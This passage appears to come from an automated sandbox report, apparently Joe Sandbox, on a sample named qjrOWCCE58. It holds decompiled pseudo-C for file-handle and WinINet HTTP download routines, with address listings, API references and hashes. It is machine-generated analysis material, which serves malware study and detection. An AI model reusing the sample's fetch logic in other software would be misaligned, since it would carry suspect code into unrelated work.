												__eflags =  *_t87;
											}
										}
										_t268 = _v44;
										__eflags = (_t268 & 0xc0000000) - 0xc0000000;
										if((_t268 & 0xc0000000) != 0xc0000000) {
											L32:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L32;
											}
											CloseHandle(_v12);
											_v44 = _t268 & 0x7fffffff;
											_t214 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v48, _t214 << 2);
											_t246 = E00426B47();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t216 =  *_t189;
												_t218 = (_t216 & 0x0000003f) * 0x38;
												__eflags = _t218;
												 *((intOrPtr*)( *((intOrPtr*)(0x43c8e0 + (_t216 >> 6) * 4)) + _t218 + 0x18)) = _t246;
												goto L32;
											}
											E00411DAB(GetLastError());
											 *( *((intOrPtr*)(0x43c8e0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x43c8e0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
											E00423CF1( *_t189);
											L10:
											goto L2;
										}
									}
									_push(_t242);
									goto L21;
								} else {
									_t267 = E00426D56(_t204,  *_t189);
									__eflags = _t267;
									if(__eflags == 0) {
										goto L22;
									}
									_push( *_t189);
									L21:
									E0041D463(__eflags);
									return _t267;
								}
							}
							_t271 = GetLastError();
							E00411DAB(_t271);
							 *( *((intOrPtr*)(0x43c8e0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x43c8e0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(__eflags == 0) {
								 *((intOrPtr*)(E00411DE1(__eflags))) = 0xd;
							}
							goto L2;
						}
						_t233 = _v44;
						__eflags = (_t233 & 0xc0000000) - 0xc0000000;
						if((_t233 & 0xc0000000) != 0xc0000000) {
							L9:
							_t234 =  *_t189;
							_t236 = (_t234 & 0x0000003f) * 0x38;
							_t178 =  *((intOrPtr*)(0x43c8e0 + (_t234 >> 6) * 4));
							_t33 = _t178 + _t236 + 0x28;
							 *_t33 =  *(_t178 + _t236 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E00411DAB(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v44 = _t233 & 0x7fffffff;
						_t238 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t285,  &_v48, _t238 << 2);
						_t196 = 0;
						_t253 = E00426B47();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E00411DCE(__eflags)) =  *_t184 & 0x00000000;
						 *_t189 = _t264;
						 *((intOrPtr*)(E00411DE1(__eflags))) = 0x18;
						goto L2;
					}
				} else {
					_t186 = E00411DCE(_t288);
					 *_t186 =  *_t186 & 0x00000000;
					_t289 =  *_t186;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E00411DE1(_t289)));
				}
			}

0x00426eb1
0x00426eb5
0x00426eb6
0x00426eb6
0x00426eb6
0x00426eb8
0x00426ebb
0x00426ebe
0x00426ed9
0x00426ede
0x00426ee1
0x00426ee3
0x00426ee5
0x00426f04
0x00426f0b
0x00426f12
0x00426f15
0x00426f21
0x00426f24
0x00426f2c
0x00426f2d
0x00426f30
0x00426f30
0x00426f37
0x00426f39
0x00426f3c
0x00426f44
0x00426f47
0x00426fb4
0x00426fb5
0x00426fbb
0x00426fbd
0x00427006
0x00427009
0x00427012
0x00427015
0x00427018
0x0042701a
0x0042701a
0x0042701a
0x0042700b
0x0042700e
0x0042700e
0x0042701f
0x00427022
0x0042702e
0x00427033
0x0042703f
0x00427049
0x0042704d
0x00427057
0x0042705a
0x00427065
0x0042706a
0x00427089
0x0042708c
0x00427090
0x00427091
0x00427097
0x0042709c
0x0042709f
0x004270a1
0x004270a3
0x004270a8
0x004270aa
0x004270ac
0x004270af
0x004270b1
0x004270cb
0x004270ef
0x004270f3
0x004270f7
0x004270f9
0x004270fd
0x004270ff
0x00427109
0x0042710c
0x00427113
0x00427113
0x00427113
0x00427113
0x004270fd
0x00427118
0x00427124
0x00427126
0x004271b1
0x004271b1
0x00000000
0x0042712c
0x0042712c
0x00427130
0x00000000
0x00000000
0x00427135
0x00427147
0x0042714f
0x00427152
0x00427153
0x00427156
0x0042715d
0x00427162
0x00427165
0x00427199
0x004271a3
0x004271a3
0x004271ad
0x00000000
0x004271ad
0x0042716e
0x00427187
0x0042718e
0x00426fae
0x00000000
0x00426fae
0x00427126
0x004270b3
0x00000000
0x0042706c
0x00427073
0x00427076
0x00427078
0x00000000
0x00000000
0x0042707a
0x0042707c
0x0042707c
0x00000000
0x00427082
0x0042706a
0x00426fc5
0x00426fc8
0x00426fe3
0x00426fe8
0x00426fee
0x00426ff0
0x00426ffb
0x00426ffb
0x00000000
0x00426ff0
0x00426f49
0x00426f50
0x00426f52
0x00426f89
0x00426f89
0x00426f93
0x00426f96
0x00426f9d
0x00426f9d
0x00426f9d
0x00426fa9
0x00000000
0x00426fa9
0x00426f54
0x00426f58
0x00000000
0x00000000
0x00426f5a
0x00426f69
0x00426f6e
0x00426f71
0x00426f72
0x00426f75
0x00426f75
0x00426f7c
0x00426f7e
0x00426f81
0x00426f84
0x00426f87
0x00000000
0x00000000
0x00000000
0x00426ee7
0x00426eec
0x00426eef
0x00426ef6
0x00000000
0x00426ef6
0x00426ec0
0x00426ec0
0x00426ec5
0x00426ec5
0x00426ecb
0x00426ecd
0x00000000
0x00426ed2

APIs

Part of subcall function 00426B47: CreateFileW.KERNEL32(00000000,?,?,7oB,?,?,00000000,?,00426F37,00000000,0000000C), ref: 00426B64

GetLastError.KERNEL32 ref: 00426FA2
__dosmaperr.LIBCMT ref: 00426FA9
GetFileType.KERNEL32(00000000), ref: 00426FB5
GetLastError.KERNEL32 ref: 00426FBF
__dosmaperr.LIBCMT ref: 00426FC8
CloseHandle.KERNEL32(00000000), ref: 00426FE8
CloseHandle.KERNEL32(0041C8C8), ref: 00427135
GetLastError.KERNEL32 ref: 00427167
__dosmaperr.LIBCMT ref: 0042716E

Strings

H, xrefs: 004270F3

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 686d4a083390995c5d14d393325f69465a6112752a4209cee1f49d357e9fa3e3
Instruction ID: 0dc36a9d27514b98a370a06d15e1ee90f262ff42bbea0f94b47420f932ab176f
Opcode Fuzzy Hash: 686d4a083390995c5d14d393325f69465a6112752a4209cee1f49d357e9fa3e3
Instruction Fuzzy Hash: A1A13532B041648FCF19EF68EC91BAE3BB1AF06324F55015EE801EB391C7399916DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004012E0 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 103
networkCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E004012E0(void* __ebx, void* __edi, void* __eflags, void* _a4) {
				char* _v8;
				char* _v12;
				char* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _v40;
				char* _v48;
				char _v56;
				void _v60;
				intOrPtr _v64;
				char* _v68;
				char* _v84;
				intOrPtr _v88;
				signed int _v92;
				void* _v96;
				void* _v140;
				char _v160;
				signed int _v168;
				void _v292;
				int _v296;
				long _v300;
				char* _v304;
				char _v320;
				signed int _v324;
				signed int _v328;
				short* _v332;
				char* _v336;
				signed int _v340;
				char* _v344;
				char* _v360;
				signed int _v364;
				char* _v368;
				char* _v384;
				void* _v472;
				intOrPtr* _v632;
				char _v652;
				signed int _v660;
				intOrPtr _v664;
				char* _v668;
				char* _v684;
				intOrPtr _v688;
				char* _v716;
				void* __esi;
				void* __ebp;
				signed int _t243;
				signed int _t244;
				int _t261;
				char* _t263;
				signed int _t268;
				signed int _t269;
				signed int _t276;
				char _t277;
				signed int _t282;
				signed int _t288;
				signed int _t289;
				short* _t296;
				signed int _t299;
				intOrPtr* _t302;
				signed int _t303;
				signed int _t305;
				short* _t309;
				signed int _t312;
				signed int _t314;
				signed int _t319;
				char* _t324;
				signed int _t331;
				signed int _t333;
				void* _t339;
				intOrPtr _t352;
				signed int _t357;
				char* _t358;
				void* _t366;
				signed int _t371;
				void* _t376;
				char* _t379;
				signed int _t387;
				signed int _t389;
				void* _t390;
				void* _t391;
				void* _t393;
				char* _t394;
				signed int _t395;
				void* _t397;
				intOrPtr _t398;
				void* _t400;
				void* _t401;
				char* _t410;
				intOrPtr* _t418;
				int _t422;
				short* _t429;
				void* _t436;
				char* _t438;
				char* _t441;
				intOrPtr* _t442;
				char _t456;
				char* _t458;
				char* _t465;
				signed int _t468;
				void* _t470;
				short* _t473;
				signed int _t476;
				char _t480;
				intOrPtr* _t482;
				intOrPtr _t484;
				signed int _t485;
				void* _t486;
				void* _t489;
				void* _t491;
				void* _t492;
				void* _t493;
				void* _t494;
				int _t495;
				short* _t496;
				signed int _t498;
				signed int _t500;
				signed int _t501;
				signed int _t502;
				void* _t504;
				intOrPtr* _t505;
				signed int _t506;
				void* _t509;
				char* _t510;
				void* _t511;
				void* _t512;
				void* _t513;
				void* _t514;
				intOrPtr _t515;
				void* _t517;
				void* _t518;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				void* _t525;
				signed int _t526;
				void* _t528;
				void* _t529;
				void* _t530;
				signed int _t531;
				void* _t532;
				void* _t534;
				void* _t535;

				_t388 = __ebx;
				_push(0xffffffff);
				_push(0x42aa4d);
				_push( *[fs:0x0]);
				_t526 = _t525 - 0x24;
				_t243 =  *0x43b054; // 0x41d6575c
				_t244 = _t243 ^ _t521;
				_v24 = _t244;
				_push(__edi);
				_push(_t244);
				 *[fs:0x0] =  &_v16;
				_t491 = _a4;
				_push(0x7d);
				_v48 = 0;
				_v32 = 0;
				_v28 = 0xf;
				_v48 = 0;
				E00402030( &_v48, "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1");
				_v8 = 0;
				_t248 =  >=  ? _v48 :  &_v48;
				HttpAddRequestHeadersA(_t491,  >=  ? _v48 :  &_v48, _v32, 0x20000000);
				_push(0x28);
				E00402030( &_v48, "Accept-Language: ru-RU,ru;q=0.9,en;q=0.8");
				_t252 =  >=  ? _v48 :  &_v48;
				HttpAddRequestHeadersA(_t491,  >=  ? _v48 :  &_v48, _v32, 0x20000000);
				_push(0x32);
				E00402030( &_v48, "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1");
				_t256 =  >=  ? _v48 :  &_v48;
				HttpAddRequestHeadersA(_t491,  >=  ? _v48 :  &_v48, _v32, 0x20000000);
				_push(0x37);
				E00402030( &_v48, "Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0");
				_t260 =  >=  ? _v48 :  &_v48;
				_t261 = HttpAddRequestHeadersA(_t491,  >=  ? _v48 :  &_v48, _v32, 0x20000000);
				_t468 = _v28;
				if(_t468 < 0x10) {
					L4:
					 *[fs:0x0] = _v16;
					_pop(_t492);
					_pop(_t509);
					return E0040D3AF(_t261, _t388, _v24 ^ _t521, _t468, _t492, _t509);
				} else {
					_t410 = _v48;
					_t468 = _t468 + 1;
					_t263 = _t410;
					if(_t468 < 0x1000) {
						L3:
						_push(_t468);
						_t261 = E0040D5EF(_t410);
						goto L4;
					} else {
						_t410 =  *(_t410 - 4);
						_t468 = _t468 + 0x23;
						if(_t263 - _t410 + 0xfffffffc > 0x1f) {
							E00411D17(__ebx, _t410, _t468, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t521);
							_t522 = _t526;
							_push(0xffffffff);
							_push(0x42aa9b);
							_push( *[fs:0x0]);
							_t528 = _t526 - 0x170;
							_t268 =  *0x43b054; // 0x41d6575c
							_t269 = _t268 ^ _t522;
							_v168 = _t269;
							_push(__ebx);
							_push(HttpAddRequestHeadersA);
							_push(_t491);
							_push(_t269);
							 *[fs:0x0] =  &_v160;
							_t510 = _t410;
							__eflags = _t510[0x28];
							_t493 = _v140;
							_v472 = _t493;
							if(__eflags != 0) {
								_v336 = _t510[0x34];
							} else {
								_t510[0x30] = 0x7800;
								_t387 = E0040D5FD(_t493, _t510, __eflags, 0x7800);
								_t528 = _t528 + 4;
								_t510[0x28] = _t387;
								_t510[0x34] = 0;
								_v336 = 0;
							}
							_v300 = 0;
							InternetSetFilePointer(_t493, 0, 0, 0, 0);
							while(1) {
								_t276 = InternetReadFile(_t493,  &(_t510[0x34][_t510[0x28]]), 0x3e8,  &_v300);
								_t469 = _v300;
								_t389 = _t276;
								_t277 = _t510[0x30];
								_t510[0x34] =  &(_t510[0x34][_t469]);
								__eflags = _t277 - _t510[0x34] - 0x3e8;
								if(__eflags <= 0) {
									_t510[0x30] = _t277 + 0x7800;
									_t506 = E0040D5FD(_t493, _t510, __eflags, _t277 + 0x7800);
									__eflags =  &(_t510[0x34][1]);
									E0040ECB0(_t506, _t510[0x28],  &(_t510[0x34][1]));
									L0040D3BD(_t510[0x28]);
									_t469 = _v300;
									_t528 = _t528 + 0x14;
									_t510[0x28] = _t506;
									_t493 = _v332;
								}
								__eflags = _t389;
								if(_t389 == 0) {
									break;
								}
								__eflags = _t469;
								if(_t469 != 0) {
									continue;
								}
								break;
							}
							_v300 = 0x103;
							E0040F2F0(_t493,  &_v292, 0, 0x104);
							_t529 = _t528 + 0xc;
							_t282 = HttpQueryInfoA(_t493, 0x1d,  &_v292,  &_v300, 0);
							__eflags = _t282;
							if(_t282 == 0) {
								L38:
								_t510[0x34][_t510[0x28]] = 0;
								 *[fs:0x0] = _v20;
								_pop(_t494);
								_pop(_t511);
								_pop(_t390);
								__eflags = _v28 ^ _t522;
								return E0040D3AF(_t510[0x34] - _v336, _t390, _v28 ^ _t522, _t469, _t494, _t511);
							} else {
								_v328 = 0;
								_t288 =  &_v320;
								_v324 = 0;
								__imp__CoCreateInstance(_t288, 0, 1, 0x42c2a0,  &_v328);
								__eflags = _t288;
								if(_t288 < 0) {
									goto L38;
								} else {
									__eflags = _v328;
									if(_v328 == 0) {
										goto L38;
									} else {
										_t418 =  &_v292;
										_v360 = 0;
										_v344 = 0;
										_t470 = _t418 + 1;
										_v340 = 0xf;
										_v360 = 0;
										asm("o16 nop [eax+eax]");
										do {
											_t289 =  *_t418;
											_t418 = _t418 + 1;
											__eflags = _t289;
										} while (_t289 != 0);
										_push(_t418 - _t470);
										E00402030( &_v360,  &_v292);
										_v12 = 0;
										_t391 = MultiByteToWideChar;
										_t422 =  &(_v344[1]);
										__eflags = _v340 - 0x10;
										_t293 =  >=  ? _v360 :  &_v360;
										_v296 = _t422;
										_t495 = MultiByteToWideChar(0, 0,  >=  ? _v360 :  &_v360, _t422, 0, 0);
										_t296 = E0040D5FD(_t495, _t510, __eflags,  ~(0 | __eflags > 0x00000000) | _t294 * 0x00000002);
										_t530 = _t529 + 4;
										_v332 = _t296;
										__eflags = _v340 - 0x10;
										_t428 =  >=  ? _v360 :  &_v360;
										_t496 = _t296;
										MultiByteToWideChar(0, 0,  >=  ? _v360 :  &_v360, _v296, _t496, _t495);
										_t429 = _t496;
										_v384 = 0;
										__eflags = 0;
										_v368 = 0;
										_v364 = 7;
										_v384 = 0;
										_t99 =  &(_t429[1]); // 0x2
										_t473 = _t99;
										do {
											_t299 =  *_t429;
											_t429 =  &(_t429[1]);
											__eflags = _t299;
										} while (_t299 != 0);
										E00401ED0( &_v384, _t496, _t429 - _t473 >> 1);
										L0040D3BD(_t496);
										_t531 = _t530 + 4;
										_v12 = 1;
										_t302 = _v328;
										__eflags = _v364 - 8;
										_t475 =  >=  ? _v384 :  &_v384;
										_t303 =  *((intOrPtr*)( *_t302 + 0x10))(_t302,  >=  ? _v384 :  &_v384, L"text",  &_v324);
										_v12 = 0;
										_t498 = _t303;
										_t476 = _v364;
										__eflags = _t476 - 8;
										if(_t476 < 8) {
											L25:
											_v12 = 0xffffffff;
											_t469 = _v340;
											_v368 = 0;
											_v364 = 7;
											_v384 = 0;
											__eflags = _t469 - 0x10;
											if(_t469 < 0x10) {
												L29:
												__eflags = _t498;
												if(_t498 >= 0) {
													__eflags = _v324;
													if(__eflags != 0) {
														_t393 = (_t510[0x34] - _v336) * 8 - _t510[0x34] - _v336;
														_t309 = E0040D5FD(_t498, _t510, __eflags, _t393);
														_t532 = _t531 + 4;
														_t436 = _t510[0x34] - _v336;
														_v296 = 0;
														_v304 = 0;
														_t499 =  *_v324;
														_v332 = _t309;
														_t469 = _v324;
														_t394 = _v336;
														_t312 =  *((intOrPtr*)( *_v324 + 0x10))(_v324, 0, _t436,  &(_t394[_t510[0x28]]), _t393, _t309, _t436,  &_v304,  &_v296, 0);
														__eflags = _t312;
														if(_t312 >= 0) {
															_t316 = _v296;
															_t480 = _t510[0x30];
															_t438 =  &(_t394[_v296]);
															__eflags = _t480 - _t438;
															if(__eflags > 0) {
																_t500 = _t510[0x28];
															} else {
																_t510[0x30] =  &(_t438[0x3e8]);
																_t500 = E0040D5FD(_t499, _t510, __eflags,  &(_t438[0x3e8]));
																E00401050(_t500, _t510[0x30], _t510[0x28], _t394);
																L0040D3BD(_t510[0x28]);
																_t480 = _t510[0x30];
																_t532 = _t532 + 0x10;
																_t316 = _v296;
																_t510[0x28] = _t500;
															}
															_t469 = _t480 - _t394;
															E00401050( &(_t394[_t500]), _t480 - _t394, _v332, _t316);
															_t532 = _t532 + 8;
															_t319 =  &(_t394[_v296]);
															__eflags = _t319;
															_t510[0x34] = _t319;
														}
														L0040D3BD(_v332);
														_t314 = _v324;
														 *((intOrPtr*)( *_t314 + 8))(_t314);
													}
												}
												_t305 = _v328;
												 *((intOrPtr*)( *_t305 + 8))(_t305);
												goto L38;
											} else {
												_t441 = _v360;
												_t469 = _t469 + 1;
												_t324 = _t441;
												__eflags = _t469 - 0x1000;
												if(_t469 < 0x1000) {
													L28:
													_push(_t469);
													E0040D5EF(_t441);
													_t531 = _t531 + 8;
													goto L29;
												} else {
													_t441 =  *(_t441 - 4);
													_t469 = _t469 + 0x23;
													__eflags = _t324 - _t441 + 0xfffffffc - 0x1f;
													if(__eflags > 0) {
														goto L39;
													} else {
														goto L28;
													}
												}
											}
										} else {
											_t465 = _v384;
											_t489 = 2 + _t476 * 2;
											_t379 = _t465;
											__eflags = _t489 - 0x1000;
											if(_t489 < 0x1000) {
												L24:
												_push(_t489);
												E0040D5EF(_t465);
												_t531 = _t531 + 8;
												goto L25;
											} else {
												_t441 =  *(_t465 - 4);
												_t469 = _t489 + 0x23;
												__eflags = _t379 - _t441 + 0xfffffffc - 0x1f;
												if(__eflags > 0) {
													L39:
													E00411D17(_t391, _t441, _t469, __eflags);
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													_push(_t522);
													_t523 = _t531;
													_push(0xffffffff);
													_push(0x42aae5);
													_push( *[fs:0x0]);
													_t534 = _t531 - 0x48;
													_t331 =  *0x43b054 ^ _t523;
													__eflags = _t331;
													_v660 = _t331;
													_push(_t391);
													_push(_t510);
													_push(_t498);
													_push(_t331);
													 *[fs:0x0] =  &_v652;
													_v716 = _t441;
													_t482 = _v632;
													_t442 = _t482;
													_v684 = 0;
													_v688 = _t482;
													_v668 = 0;
													_v664 = 0xf;
													_t512 = _t442 + 1;
													_v684 = 0;
													do {
														_t333 =  *_t442;
														_t442 = _t442 + 1;
														__eflags = _t333;
													} while (_t333 != 0);
													_push(_t442 - _t512);
													E00402030( &_v56, _t482);
													_v16 = 0;
													_t395 = _v36;
													__eflags = _t395 - 0x10;
													_t513 = _v40;
													_t483 = _t513;
													_t446 =  >=  ? _v56 :  &_v56;
													_t501 = E00402180( >=  ? _v56 :  &_v56, _t513,  >=  ? _v56 :  &_v56, "http://", 7);
													_t535 = _t534 + 0xc;
													__eflags = _t501 - 0xffffffff;
													if(_t501 == 0xffffffff) {
														L45:
														__eflags = _v36 - 0x10;
														_t397 =  >=  ? _v56 :  &_v56;
														__eflags = _t513;
														if(_t513 == 0) {
															L48:
															_t502 = _t501 | 0xffffffff;
															__eflags = _t502;
														} else {
															_t501 = E0040F240(_t397, 0x2f, _t513);
															_t535 = _t535 + 0xc;
															__eflags = _t501;
															if(_t501 == 0) {
																goto L48;
															} else {
																_t502 = _t501 - _t397;
															}
														}
														__eflags = _t513 - _t502;
														_v84 = 0;
														_v68 = 0;
														_t448 =  <  ? _t513 : _t502;
														_v64 = 0xf;
														__eflags = _v36 - 0x10;
														_push( <  ? _t513 : _t502);
														_t337 =  >=  ? _v56 :  &_v56;
														_v84 = 0;
														E00402030( &_v84,  >=  ? _v56 :  &_v56);
														_v16 = 1;
														_t339 = _v40;
														__eflags = _t339 - _t502;
														_t503 =  <  ? _t339 : _t502;
														__eflags = _v36 - 0x10;
														_t451 =  >=  ? _v56 :  &_v56;
														_t340 = _t339 - ( <  ? _t339 : _t502);
														_v40 = _t339 - ( <  ? _t339 : _t502);
														E0040ECB0( >=  ? _v56 :  &_v56,  &(( >=  ? _v56 :  &_v56)[ <  ? _t339 : _t502]), _t339 - ( <  ? _t339 : _t502) + 1);
														_t398 = _v88;
														_v92 = 0;
														E00411DF4(_t398 + 0x44, 0x104, _v60, 0x103);
														_t535 = _t535 + 0x1c;
														asm("sbb eax, eax");
														_t513 = InternetOpenA( *(_t398 + 0xc),  ~( *(_t398 + 0x38)) & 0x00000003,  *(_t398 + 0x38), 0, 0);
														_v96 = _t513;
														__eflags = _t513;
														if(_t513 != 0) {
															_v60 = 1;
															InternetSetOptionA(_t513, 0x41,  &_v60, 4);
															__eflags = _v64 - 0x10;
															_t365 =  >=  ? _v84 :  &_v84;
															_t366 = InternetConnectA(_t513,  >=  ? _v84 :  &_v84, 0x50,  *(_t398 + 0x3c),  *(_t398 + 0x40), 3, 0, 1);
															_t505 = InternetCloseHandle;
															_t401 = _t366;
															__eflags = _t401;
															if(_t401 != 0) {
																__eflags = _v36 - 0x10;
																_t460 =  >=  ? _v56 :  &_v56;
																_t517 = HttpOpenRequestA(_t401, "GET",  >=  ? _v56 :  &_v56, 0, 0, 0, 0x80400000, 1);
																__eflags = _t517;
																if(__eflags != 0) {
																	E004012E0(_t401, InternetCloseHandle, __eflags, _t517);
																	_t371 = HttpSendRequestA(_t517, 0, 0, 0, 0);
																	__eflags = _t371;
																	if(_t371 != 0) {
																		_push(_t517);
																		L6();
																		_v92 = _t371;
																	}
																	 *_t505(_t517);
																}
																 *_t505(_t401);
																_t513 = _v96;
															}
															 *_t505(_t513);
														}
														_t484 = _v64;
														__eflags = _v92;
														_t395 = 0 | _v92 > 0x00000000;
														__eflags = _t484 - 0x10;
														if(_t484 < 0x10) {
															L61:
															_t485 = _v36;
															_v68 = 0;
															_v64 = 0xf;
															_v84 = 0;
															__eflags = _t485 - 0x10;
															if(_t485 < 0x10) {
																L65:
																 *[fs:0x0] = _v24;
																_pop(_t504);
																_pop(_t514);
																_pop(_t400);
																__eflags = _v32 ^ _t523;
																return E0040D3AF(_t395, _t400, _v32 ^ _t523, _t485, _t504, _t514);
															} else {
																_t456 = _v56;
																_t485 = _t485 + 1;
																_t352 = _t456;
																__eflags = _t485 - 0x1000;
																if(_t485 < 0x1000) {
																	L64:
																	_push(_t485);
																	E0040D5EF(_t456);
																	goto L65;
																} else {
																	_t456 =  *((intOrPtr*)(_t456 - 4));
																	_t485 = _t485 + 0x23;
																	__eflags = _t352 - _t456 + 0xfffffffc - 0x1f;
																	if(__eflags > 0) {
																		goto L67;
																	} else {
																		goto L64;
																	}
																}
															}
														} else {
															_t458 = _v84;
															_t486 = _t484 + 1;
															_t358 = _t458;
															__eflags = _t486 - 0x1000;
															if(_t486 < 0x1000) {
																L60:
																_push(_t486);
																E0040D5EF(_t458);
																_t535 = _t535 + 8;
																goto L61;
															} else {
																_t456 =  *((intOrPtr*)(_t458 - 4));
																_t485 = _t486 + 0x23;
																__eflags = _t358 - _t456 + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	goto L67;
																} else {
																	goto L60;
																}
															}
														}
													} else {
														__eflags = _t513 - _t501;
														if(_t513 < _t501) {
															E00402170(_t446, _t483);
															L67:
															E00411D17(_t395, _t456, _t485, __eflags);
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															_push(_t523);
															_push(_t513);
															_t515 = _t456;
															_t357 =  *(_t515 + 0x2c);
															 *(_t515 + 0x34) = 0;
															__eflags = _t357;
															if(_t357 != 0) {
																_t357 = L0040D3BD(_t357);
																 *(_t515 + 0x2c) = 0;
															}
															_push(_v8);
															L40();
															return _t357;
														} else {
															_t376 = _t513 - _t501;
															__eflags = _t376 - 7;
															_t488 =  <  ? _t376 : 7;
															__eflags = _t395 - 0x10;
															_t463 =  >=  ? _v56 :  &_v56;
															_t518 = _t513 - 7;
															_t464 =  &(( >=  ? _v56 :  &_v56)[_t501]);
															_v40 = _t518;
															__eflags = _t518 - _t501 + 1;
															E0040ECB0( &(( >=  ? _v56 :  &_v56)[_t501]),  &(( &(( >=  ? _v56 :  &_v56)[_t501]))[ <  ? _t376 : 7]), _t518 - _t501 + 1);
															_t513 = _v40;
															_t535 = _t535 + 0xc;
															goto L45;
														}
													}
												} else {
													goto L24;
												}
											}
										}
									}
								}
							}
						} else {
							goto L3;
						}
					}
				}
			}

0x004012e0
0x004012e3
0x004012e5
0x004012f0
0x004012f1
0x004012f4
0x004012f9
0x004012fb
0x004012ff
0x00401300
0x00401304
0x0040130a
0x00401310
0x00401312
0x0040131e
0x00401325
0x0040132c
0x00401330
0x00401335
0x00401349
0x00401357
0x00401359
0x00401363
0x00401377
0x0040137d
0x0040137f
0x00401389
0x0040139d
0x004013a3
0x004013a5
0x004013af
0x004013c3
0x004013c9
0x004013cb
0x004013d1
0x004013fb
0x004013fe
0x00401406
0x00401407
0x00401415
0x004013d3
0x004013d3
0x004013d6
0x004013d7
0x004013df
0x004013f1
0x004013f1
0x004013f3
0x00000000
0x004013e1
0x004013e1
0x004013e4
0x004013ef
0x00401418
0x0040141d
0x0040141e
0x0040141f
0x00401420
0x00401421
0x00401423
0x00401425
0x00401430
0x00401431
0x00401437
0x0040143c
0x0040143e
0x00401441
0x00401442
0x00401443
0x00401444
0x00401448
0x0040144e
0x00401450
0x00401454
0x00401457
0x0040145d
0x0040148c
0x0040145f
0x00401464
0x0040146b
0x00401470
0x00401473
0x00401476
0x0040147d
0x0040147d
0x0040149b
0x004014a5
0x004014b0
0x004014c4
0x004014ca
0x004014d0
0x004014d2
0x004014d7
0x004014dd
0x004014e3
0x004014eb
0x004014f6
0x004014f8
0x004014fe
0x00401506
0x0040150b
0x00401511
0x00401514
0x00401517
0x00401517
0x0040151d
0x0040151f
0x00000000
0x00000000
0x00401521
0x00401523
0x00000000
0x00000000
0x00000000
0x00401523
0x00401530
0x0040153d
0x00401542
0x00401558
0x0040155e
0x00401560
0x004018c5
0x004018cb
0x004018db
0x004018e3
0x004018e4
0x004018e5
0x004018e9
0x004018f3
0x00401566
0x0040156c
0x00401580
0x00401586
0x00401591
0x00401597
0x00401599
0x00000000
0x0040159f
0x0040159f
0x004015a6
0x00000000
0x004015ac
0x004015ac
0x004015b2
0x004015bc
0x004015c6
0x004015c9
0x004015d3
0x004015da
0x004015e0
0x004015e0
0x004015e2
0x004015e3
0x004015e3
0x004015ef
0x004015f7
0x004015fc
0x0040160f
0x00401615
0x00401616
0x0040161f
0x0040162e
0x00401638
0x00401649
0x0040164e
0x00401651
0x00401657
0x00401664
0x0040166c
0x0040167a
0x0040167c
0x0040167e
0x00401688
0x0040168a
0x00401694
0x0040169e
0x004016a5
0x004016a5
0x004016b0
0x004016b0
0x004016b3
0x004016b6
0x004016b6
0x004016c7
0x004016cd
0x004016d2
0x004016d5
0x004016df
0x004016eb
0x004016f3
0x00401703
0x00401706
0x0040170a
0x0040170c
0x00401712
0x00401715
0x0040174c
0x0040174e
0x00401755
0x0040175b
0x00401765
0x0040176f
0x00401776
0x00401779
0x004017aa
0x004017aa
0x004017ac
0x004017b2
0x004017b9
0x004017cf
0x004017d2
0x004017dd
0x004017e3
0x004017e9
0x004017f5
0x004017ff
0x0040180e
0x00401815
0x00401821
0x0040182e
0x00401831
0x00401833
0x00401835
0x0040183b
0x0040183e
0x00401841
0x00401843
0x0040187d
0x00401845
0x0040184c
0x00401857
0x0040185f
0x00401867
0x0040186c
0x0040186f
0x00401872
0x00401878
0x00401878
0x00401887
0x0040188c
0x00401897
0x0040189a
0x0040189a
0x0040189c
0x0040189c
0x004018a5
0x004018aa
0x004018b6
0x004018b6
0x004017b9
0x004018b9
0x004018c2
0x00000000
0x0040177b
0x0040177b
0x00401781
0x00401782
0x00401784
0x0040178a
0x004017a0
0x004017a0
0x004017a2
0x004017a7
0x00000000
0x0040178c
0x0040178c
0x0040178f
0x00401797
0x0040179a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040179a
0x0040178a
0x00401717
0x00401717
0x0040171d
0x00401724
0x00401726
0x0040172c
